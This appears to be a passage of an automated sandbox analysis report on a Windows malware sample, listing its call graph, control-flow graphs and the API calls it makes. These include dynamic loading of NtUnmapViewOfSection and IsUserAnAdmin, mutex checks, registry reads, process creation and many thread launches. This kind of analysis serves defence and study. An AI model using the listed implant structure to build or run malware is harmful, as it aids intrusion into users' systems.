API calls 45956->46293 45961 401e45 22 API calls 45957->45961 45967 40d6bf 45959->45967 45969 40d720 45961->45969 45962 40dd22 46294 410eda 65 API calls ___scrt_fastfail 45962->46294 45964 40d63b 45964->45937 46262 41239a 30 API calls 45964->46262 45965 40dcfa 45995 40dd6a 45965->45995 46295 402073 28 API calls 45965->46295 45967->45957 45974 40d6f7 45967->45974 45981 40d6db 45967->45981 45968 40d731 45972 401e45 22 API calls 45968->45972 45969->45968 46267 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45969->46267 45980 40d73a 45972->45980 46275 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45973->46275 46265 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45974->46265 45975 40dd3a 46296 4052dd 28 API calls 45975->46296 45986 401e45 22 API calls 45980->45986 45981->45957 46264 4067a0 36 API calls ___scrt_fastfail 45981->46264 45983 40d70d 45983->45957 46266 4066a6 58 API calls 45983->46266 45991 40d755 45986->45991 45992 401e45 22 API calls 45987->45992 45997 401e45 22 API calls 45991->45997 45994 40da10 45992->45994 46276 402073 28 API calls 45994->46276 46297 413980 161 API calls _strftime 45995->46297 46000 40d76f 45997->46000 46002 401e45 22 API calls 46000->46002 46001 40da22 46277 41215f 14 API calls 46001->46277 46004 40d789 46002->46004 46008 401e45 22 API calls 46004->46008 46005 40da38 46006 401e45 22 API calls 46005->46006 46007 40da44 46006->46007 46278 439867 39 API calls _strftime 46007->46278 46011 40d7a3 46008->46011 46010 40d810 46010->45973 46017 401e45 22 API calls 46010->46017 46050 40d89f ___scrt_fastfail 46010->46050 46011->46010 46013 401e45 22 API calls 46011->46013 46012 40da51 46014 40da7e 46012->46014 46279 41aa4f 81 API calls ___scrt_fastfail 46012->46279 46022 40d7b8 _wcslen 46013->46022 46280 402073 28 API calls 46014->46280 46020 40d831 46017->46020 46018 40da70 CreateThread 46018->46014 46550 41b212 10 API calls 46018->46550 46019 40da8d 46281 402073 28 API calls 46019->46281 46024 401e45 22 API calls 46020->46024 46022->46010 46028 401e45 22 API calls 46022->46028 46023 40da9c 46282 4194da 79 API calls 46023->46282 46026 40d843 46024->46026 46032 401e45 22 API calls 46026->46032 46027 40daa1 46029 401e45 22 API calls 46027->46029 46030 40d7d3 46028->46030 46031 40daad 46029->46031 46034 401e45 22 API calls 46030->46034 46036 401e45 22 API calls 46031->46036 46033 40d855 46032->46033 46038 401e45 22 API calls 46033->46038 46035 40d7e8 46034->46035 46268 40c5ed 31 API calls 46035->46268 46037 40dabf 46036->46037 46041 401e45 22 API calls 46037->46041 46040 40d87e 46038->46040 46046 401e45 22 API calls 46040->46046 46043 40dad5 46041->46043 46042 40d7fb 46269 401ef3 28 API calls 46042->46269 46049 401e45 22 API calls 46043->46049 46045 40d807 46270 401ee9 11 API calls 46045->46270 46048 40d88f 46046->46048 46271 40b871 46 API calls _wcslen 46048->46271 46051 40daf5 46049->46051 46272 412338 31 API calls 46050->46272 46283 439867 39 API calls _strftime 46051->46283 46054 40d942 ctype 46058 401e45 22 API calls 46054->46058 46056 40db02 46057 401e45 22 API calls 46056->46057 46059 40db0d 46057->46059 46060 40d959 46058->46060 46061 401e45 22 API calls 46059->46061 46060->45987 46063 401e45 22 API calls 46060->46063 46062 40db1e 46061->46062 46284 408f1f 166 API calls _wcslen 46062->46284 46064 40d976 46063->46064 46273 419bca 28 API calls 46064->46273 46067 40d982 46274 40de34 88 API calls 46067->46274 46068 40db33 46070 401e45 22 API calls 46068->46070 46072 40db3c 46070->46072 46071 40db83 46073 401e45 22 API calls 46071->46073 46072->46071 46074 43229f new 22 API calls 46072->46074 46079 40db91 46073->46079 46075 40db53 46074->46075 46076 401e45 22 API calls 46075->46076 46077 40db65 46076->46077 46082 40db6c CreateThread 46077->46082 46078 40dbd9 46081 401e45 22 API calls 46078->46081 46079->46078 46080 43229f new 22 API calls 46079->46080 46083 40dba5 46080->46083 46087 40dbe2 46081->46087 46082->46071 46548 417f6a 101 API calls 2 library calls 46082->46548 46084 401e45 22 API calls 46083->46084 46085 40dbb6 46084->46085 46090 40dbbd CreateThread 46085->46090 46086 40dc4c 46088 401e45 22 API calls 46086->46088 46087->46086 46089 401e45 22 API calls 46087->46089 46092 40dc55 46088->46092 46091 40dbfc 46089->46091 46090->46078 46552 417f6a 101 API calls 2 library calls 46090->46552 46094 401e45 22 API calls 46091->46094 46093 40dc99 46092->46093 46096 401e45 22 API calls 46092->46096 46290 4195f8 79 API calls 46093->46290 46097 40dc11 46094->46097 46099 40dc69 46096->46099 46285 40c5a1 31 API calls 46097->46285 46098 40dca2 46291 401ef3 28 API calls 46098->46291 46104 401e45 22 API calls 46099->46104 46101 40dcad 46292 401ee9 11 API calls 46101->46292 46107 40dc7e 46104->46107 46105 40dc24 46286 401ef3 28 API calls 46105->46286 46106 40dcb6 CreateThread 46111 40dce5 46106->46111 46112 40dcd9 CreateThread 46106->46112 46553 40e18d 122 API calls 46106->46553 46288 439867 39 API calls _strftime 46107->46288 46110 40dc30 46287 401ee9 11 API calls 46110->46287 46111->45965 46114 40dcee CreateThread 46111->46114 46112->46111 46547 410b5c 137 API calls 46112->46547 46114->45965 46549 411140 38 API calls ___scrt_fastfail 46114->46549 46116 40dc39 CreateThread 46116->46086 46551 401bc9 49 API calls _strftime 46116->46551 46117 40dc8b 46289 40b0a3 7 API calls 46117->46289 46120 432739 46119->46120 46120->45855 46121 44091f 46120->46121 46555 44069c 46121->46555 46124->45837 46125->45841 46126->45846 46127->45844 46128->45857 46129->45843 46130->45863 46131->45865 46132->45868 46133->45870 46135 4328dc GetStartupInfoW 46134->46135 46135->45874 46137 44c24b 46136->46137 46138 44c242 46136->46138 46137->45877 46141 44c138 48 API calls 4 library calls 46138->46141 46140->45877 46141->46137 46143 41a919 LoadLibraryA GetProcAddress 46142->46143 46144 41a909 GetModuleHandleA GetProcAddress 46142->46144 46145 41a947 GetModuleHandleA GetProcAddress 46143->46145 46146 41a937 GetModuleHandleA GetProcAddress 46143->46146 46144->46143 46147 41a973 24 API calls 46145->46147 46148 41a95f GetModuleHandleA GetProcAddress 46145->46148 46146->46145 46147->45882 46148->46147 46298 419493 FindResourceA 46149->46298 46152 439adb new 21 API calls 46153 40ddad ctype 46152->46153 46301 402097 46153->46301 46156 401fc2 28 API calls 46157 40ddd3 46156->46157 46158 401fb8 11 API calls 46157->46158 46159 40dddc 46158->46159 46160 439adb new 21 API calls 46159->46160 46161 40dded ctype 46160->46161 46307 4062ee 46161->46307 46163 40de20 46163->45884 46165 4020ec 46164->46165 46166 4023ae 11 API calls 46165->46166 46167 402106 46166->46167 46168 402549 28 API calls 46167->46168 46169 402114 46168->46169 46169->45887 46342 4020bf 46170->46342 46172 419e0a 46173 401fb8 11 API calls 46172->46173 46174 419e3c 46173->46174 46175 401fb8 11 API calls 46174->46175 46177 419e44 46175->46177 46176 419e0c 46358 404182 28 API calls 46176->46358 46180 401fb8 11 API calls 46177->46180 46183 40d43c 46180->46183 46181 419e18 46184 401fc2 28 API calls 46181->46184 46182 401fc2 28 API calls 46191 419d9a 46182->46191 46192 40e563 46183->46192 46185 419e21 46184->46185 46186 401fb8 11 API calls 46185->46186 46188 419e29 46186->46188 46187 401fb8 11 API calls 46187->46191 46189 41ab9a 28 API calls 46188->46189 46189->46172 46191->46172 46191->46176 46191->46182 46191->46187 46346 404182 28 API calls 46191->46346 46347 41ab9a 46191->46347 46193 40e56f 46192->46193 46195 40e576 46192->46195 46384 402143 11 API calls 46193->46384 46195->45892 46197 402143 46196->46197 46201 40217f 46197->46201 46385 402710 11 API calls 46197->46385 46199 402164 46386 4026f2 11 API calls std::_Deallocate 46199->46386 46201->45894 46203 40e624 46202->46203 46387 40f57c 46203->46387 46209 40e663 46210 40d473 46209->46210 46403 40f663 46209->46403 46212 401e45 46210->46212 46214 401e4d 46212->46214 46213 401e55 46213->45902 46214->46213 46498 402138 22 API calls 46214->46498 46219 40f997 __EH_prolog 46217->46219 46499 40fcfb 46219->46499 46220 40f663 36 API calls 46221 40fb90 46220->46221 46503 40fce0 46221->46503 46223 40d491 46225 40e5ba 46223->46225 46224 40fa1a 46224->46220 46509 40f4c6 46225->46509 46228 40d49a 46230 40dd70 46228->46230 46229 40f663 36 API calls 46229->46228 46519 40e5da 70 API calls 46230->46519 46232 40dd7b 46234 4020bf 11 API calls 46233->46234 46235 40530a 46234->46235 46520 403280 46235->46520 46237 405326 46237->45907 46525 4051cf 46238->46525 46240 408217 46529 402035 46240->46529 46243 401fc2 46244 401fd1 46243->46244 46245 402019 46243->46245 46246 4023ae 11 API calls 46244->46246 46252 401fb8 46245->46252 46247 401fda 46246->46247 46248 40201c 46247->46248 46250 401ff5 46247->46250 46249 40265a 11 API calls 46248->46249 46249->46245 46544 403078 28 API calls 46250->46544 46253 4023ae 11 API calls 46252->46253 46254 401fc1 46253->46254 46254->45921 46256 401fb2 46255->46256 46257 401fa9 46255->46257 46256->45926 46545 4025c0 28 API calls 46257->46545 46259->45934 46260->45954 46261->45964 46262->45937 46263->45955 46264->45957 46265->45983 46266->45957 46267->45968 46268->46042 46269->46045 46270->46010 46271->46050 46272->46054 46273->46067 46274->45944 46275->45987 46276->46001 46277->46005 46278->46012 46279->46018 46280->46019 46281->46023 46282->46027 46283->46056 46284->46068 46285->46105 46286->46110 46287->46116 46288->46117 46289->46093 46290->46098 46291->46101 46292->46106 46293->45962 46295->45975 46546 418ccd 104 API calls 46297->46546 46299 4194b0 LoadResource LockResource SizeofResource 46298->46299 46300 40dd9e 46298->46300 46299->46300 46300->46152 46302 40209f 46301->46302 46310 4023ae 46302->46310 46304 4020aa 46314 4024ea 46304->46314 46306 4020b9 46306->46156 46308 402097 28 API calls 46307->46308 46309 406302 46308->46309 46309->46163 46311 402408 46310->46311 46312 4023b8 46310->46312 46311->46304 46312->46311 46321 402787 11 API calls std::_Deallocate 46312->46321 46315 4024fa 46314->46315 46316 402500 46315->46316 46317 402515 46315->46317 46322 402549 46316->46322 46332 4028c8 28 API calls 46317->46332 46320 402513 46320->46306 46321->46311 46333 402868 46322->46333 46324 40255d 46325 402572 46324->46325 46326 402587 46324->46326 46338 402a14 22 API calls 46325->46338 46340 4028c8 28 API calls 46326->46340 46329 40257b 46339 4029ba 22 API calls 46329->46339 46331 402585 46331->46320 46332->46320 46334 402870 46333->46334 46335 402878 46334->46335 46341 402c83 22 API calls 46334->46341 46335->46324 46338->46329 46339->46331 46340->46331 46343 4020c7 46342->46343 46344 4023ae 11 API calls 46343->46344 46345 4020d2 46344->46345 46345->46191 46346->46191 46348 41aba7 46347->46348 46349 41ac06 46348->46349 46353 41abb7 46348->46353 46350 41ac20 46349->46350 46351 41ad46 28 API calls 46349->46351 46368 41aec3 28 API calls 46350->46368 46351->46350 46354 41abef 46353->46354 46359 41ad46 46353->46359 46367 41aec3 28 API calls 46354->46367 46355 41ac02 46355->46191 46358->46181 46361 41ad4e 46359->46361 46360 41ad80 46360->46354 46361->46360 46362 41ad84 46361->46362 46365 41ad68 46361->46365 46379 402705 22 API calls 46362->46379 46369 41adb7 46365->46369 46367->46355 46368->46355 46370 41adc1 __EH_prolog 46369->46370 46380 4026f7 22 API calls 46370->46380 46372 41add4 46381 41aeda 11 API calls 46372->46381 46374 41ae32 46374->46360 46375 41adfa 46375->46374 46382 402710 11 API calls 46375->46382 46377 41ae19 46383 4026f2 11 API calls std::_Deallocate 46377->46383 46380->46372 46381->46375 46382->46377 46383->46374 46384->46195 46385->46199 46386->46201 46407 40f821 46387->46407 46390 40f55d 46485 40f7fb 46390->46485 46392 40f565 46490 40f44c 46392->46490 46394 40e651 46395 40f502 46394->46395 46396 40f510 46395->46396 46402 40f53f std::ios_base::_Ios_base_dtor 46395->46402 46495 4335cb 65 API calls 46396->46495 46398 40f51d 46399 40f44c 20 API calls 46398->46399 46398->46402 46400 40f52e 46399->46400 46496 40fbc8 77 API calls 6 library calls 46400->46496 46402->46209 46404 40f66b 46403->46404 46405 40f67e 46403->46405 46497 40f854 36 API calls 46404->46497 46405->46210 46414 40d2ce 46407->46414 46411 40f83c 46412 40e631 46411->46412 46413 40f663 36 API calls 46411->46413 46412->46390 46413->46412 46415 40d2ff 46414->46415 46416 43229f new 22 API calls 46415->46416 46417 40d306 46416->46417 46424 40cb7a 46417->46424 46420 40f887 46421 40f896 46420->46421 46459 40f8b7 46421->46459 46423 40f89c std::ios_base::_Ios_base_dtor 46423->46411 46427 4332ea 46424->46427 46426 40cb84 46426->46420 46428 4332f6 __EH_prolog3 46427->46428 46439 4330a5 46428->46439 46431 433332 46445 4330fd 46431->46445 46434 433314 46453 43347f 37 API calls _Atexit 46434->46453 46436 433370 std::locale::_Init 46436->46426 46437 43331c 46454 433240 21 API calls 2 library calls 46437->46454 46440 4330b4 46439->46440 46442 4330bb 46439->46442 46455 442df9 EnterCriticalSection std::_Lockit::_Lockit 46440->46455 46443 4330b9 46442->46443 46456 43393c EnterCriticalSection 46442->46456 46443->46431 46452 43345a 22 API calls 2 library calls 46443->46452 46446 433107 46445->46446 46447 442e02 46445->46447 46448 43311a 46446->46448 46457 43394a LeaveCriticalSection 46446->46457 46458 442de2 LeaveCriticalSection 46447->46458 46448->46436 46451 442e09 46451->46436 46452->46434 46453->46437 46454->46431 46455->46443 46456->46443 46457->46448 46458->46451 46460 4330a5 std::_Lockit::_Lockit 2 API calls 46459->46460 46461 40f8c9 46460->46461 46480 40cae9 4 API calls 2 library calls 46461->46480 46463 40f8dc 46464 40f8ef 46463->46464 46481 40ccd4 77 API calls new 46463->46481 46465 4330fd std::_Lockit::~_Lockit 2 API calls 46464->46465 46467 40f925 46465->46467 46467->46423 46468 40f8ff 46469 40f906 46468->46469 46470 40f92d 46468->46470 46482 4332b6 22 API calls new 46469->46482 46483 436ec6 RaiseException 46470->46483 46473 40f943 46474 40f984 46473->46474 46484 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 46473->46484 46474->46423 46480->46463 46481->46468 46482->46464 46483->46473 46486 43229f new 22 API calls 46485->46486 46487 40f80b 46486->46487 46488 40cb7a 41 API calls 46487->46488 46489 40f813 46488->46489 46489->46392 46491 40f469 46490->46491 46492 40f48b 46491->46492 46494 43aa1a 20 API calls 2 library calls 46491->46494 46492->46394 46494->46492 46495->46398 46496->46402 46497->46405 46501 40fd0e 46499->46501 46500 40fd3c 46500->46224 46501->46500 46507 40fe14 36 API calls 46501->46507 46504 40fce8 46503->46504 46505 40fcf3 46504->46505 46508 40fe79 36 API calls __EH_prolog 46504->46508 46505->46223 46507->46500 46508->46505 46510 40f4d0 46509->46510 46511 40f4d4 46509->46511 46514 40f44c 20 API calls 46510->46514 46517 40f30b 67 API calls 46511->46517 46513 40f4d9 46518 43a716 64 API calls 3 library calls 46513->46518 46516 40e5c5 46514->46516 46516->46228 46516->46229 46517->46513 46518->46510 46519->46232 46522 40328a 46520->46522 46521 4032a9 46521->46237 46522->46521 46524 4028c8 28 API calls 46522->46524 46524->46521 46526 4051db 46525->46526 46535 405254 46526->46535 46528 4051e8 46528->46240 46530 402041 46529->46530 46531 4023ae 11 API calls 46530->46531 46532 40205b 46531->46532 46540 40265a 46532->46540 46536 405262 46535->46536 46539 402884 22 API calls 46536->46539 46541 40266b 46540->46541 46542 4023ae 11 API calls 46541->46542 46543 40206d 46542->46543 46543->46243 46544->46245 46545->46256 46554 411253 61 API calls 46547->46554 46556 4406a8 _abort 46555->46556 46557 4406c0 46556->46557 46558 4407f6 _abort GetModuleHandleW 46556->46558 46577 442d9a EnterCriticalSection 46557->46577 46560 4406b4 46558->46560 46560->46557 46589 44083a GetModuleHandleExW 46560->46589 46561 440766 46578 4407a6 46561->46578 46565 44073d 46568 440755 46565->46568 46598 441707 5 API calls _ValidateLocalCookies 46565->46598 46566 440783 46581 4407b5 46566->46581 46567 4407af 46600 454909 5 API calls _ValidateLocalCookies 46567->46600 46599 441707 5 API calls _ValidateLocalCookies 46568->46599 46569 4406c8 46569->46561 46569->46565 46597 441450 20 API calls _abort 46569->46597 46577->46569 46601 442de2 LeaveCriticalSection 46578->46601 46580 44077f 46580->46566 46580->46567 46602 4461f8 46581->46602 46584 4407e3 46587 44083a _abort 8 API calls 46584->46587 46585 4407c3 GetPEB 46585->46584 46586 4407d3 GetCurrentProcess TerminateProcess 46585->46586 46586->46584 46588 4407eb ExitProcess 46587->46588 46590 440864 GetProcAddress 46589->46590 46591 440887 46589->46591 46594 440879 46590->46594 46592 440896 46591->46592 46593 44088d FreeLibrary 46591->46593 46595 432d4b _ValidateLocalCookies 5 API calls 46592->46595 46593->46592 46594->46591 46596 4408a0 46595->46596 46596->46557 46597->46565 46598->46568 46599->46561 46601->46580 46603 44621d 46602->46603 46607 446213 46602->46607 46608 4459f9 46603->46608 46606 4407bf 46606->46584 46606->46585 46615 432d4b 46607->46615 46609 445a29 46608->46609 46612 445a25 46608->46612 46609->46607 46610 445a49 46610->46609 46613 445a55 GetProcAddress 46610->46613 46612->46609 46612->46610 46622 445a95 46612->46622 46614 445a65 __crt_fast_encode_pointer 46613->46614 46614->46609 46616 432d56 IsProcessorFeaturePresent 46615->46616 46617 432d54 46615->46617 46619 432d98 46616->46619 46617->46606 46629 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46619->46629 46621 432e7b 46621->46606 46623 445ab6 LoadLibraryExW 46622->46623 46624 445aab 46622->46624 46625 445ad3 GetLastError 46623->46625 46626 445aeb 46623->46626 46624->46612 46625->46626 46627 445ade LoadLibraryExW 46625->46627 46626->46624 46628 445b02 FreeLibrary 46626->46628 46627->46626 46628->46624 46629->46621

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 450 4407b5-4407c1 call 4461f8 453 4407e3-4407ef call 44083a ExitProcess 450->453 454 4407c3-4407d1 GetPEB 450->454 454->453 455 4407d3-4407dd GetCurrentProcess TerminateProcess 454->455 455->453
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                      • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                      • ExitProcess.KERNEL32 ref: 004407EF
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                      • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                      • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                      • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                      • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                      • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                      • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                      • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                      • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                      • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule$LibraryLoad
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                      • API String ID: 551388010-2474455403
                                      • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                      • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                      • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                      • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 98 40d622-40d63f call 401f8b call 411f34 81->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 81->99 110 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->110 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 108 40d6b0-40d6b4 95->108 109 40d6a9-40d6ab 95->109 126 40d651 98->126 127 40d641-40d650 call 401f8b call 41239a 98->127 99->98 136 40dd2c 105->136 111 40d6b6-40d6c9 call 401e45 call 401f8b 108->111 112 40d717-40d72a call 401e45 call 401f8b 108->112 109->108 177 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 110->177 111->112 140 40d6cb-40d6d1 111->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 112->142 143 40d72c call 40e501 112->143 126->80 127->126 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 136->141 140->112 146 40d6d3-40d6d9 140->146 187 40dd6a-40dd6f call 413980 141->187 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 151 40d6f7-40d710 call 401f8b call 411eea 146->151 152 40d6db-40d6ee call 4060ea 146->152 151->112 175 40d712 call 4066a6 151->175 152->112 168 40d6f0-40d6f5 call 4067a0 152->168 168->112 175->112 221 40da61-40da63 177->221 222 40da65-40da67 177->222 216->110 220 40d81f-40d826 216->220 217->216 250 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 217->250 224 40d8a7-40d8b1 call 408093 220->224 225 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->225 226 40da6b-40da7c call 41aa4f CreateThread 221->226 227 40da69 222->227 228 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->228 235 40d8b6-40d8de call 40245c call 43254d 224->235 225->235 226->228 227->226 349 40db83-40db9a call 401e45 call 401f8b 228->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 228->350 256 40d8f0 235->256 257 40d8e0-40d8ee call 434c30 235->257 250->216 263 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 256->263 257->263 263->177 331 40d96d-40d98c call 401e45 call 419bca call 40de34 263->331 331->177 346 40d98e-40d990 331->346 346->90 359 40dbd9-40dbeb call 401e45 call 401f8b 349->359 360 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->360 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 359->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 359->372 360->359 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 404 40dcc1 384->404 405 40dcc4-40dcd7 CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->136 416 40dd03-40dd06 412->416 413->412 416->187 418 40dd08-40dd0d 416->418 418->141
                                      APIs
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
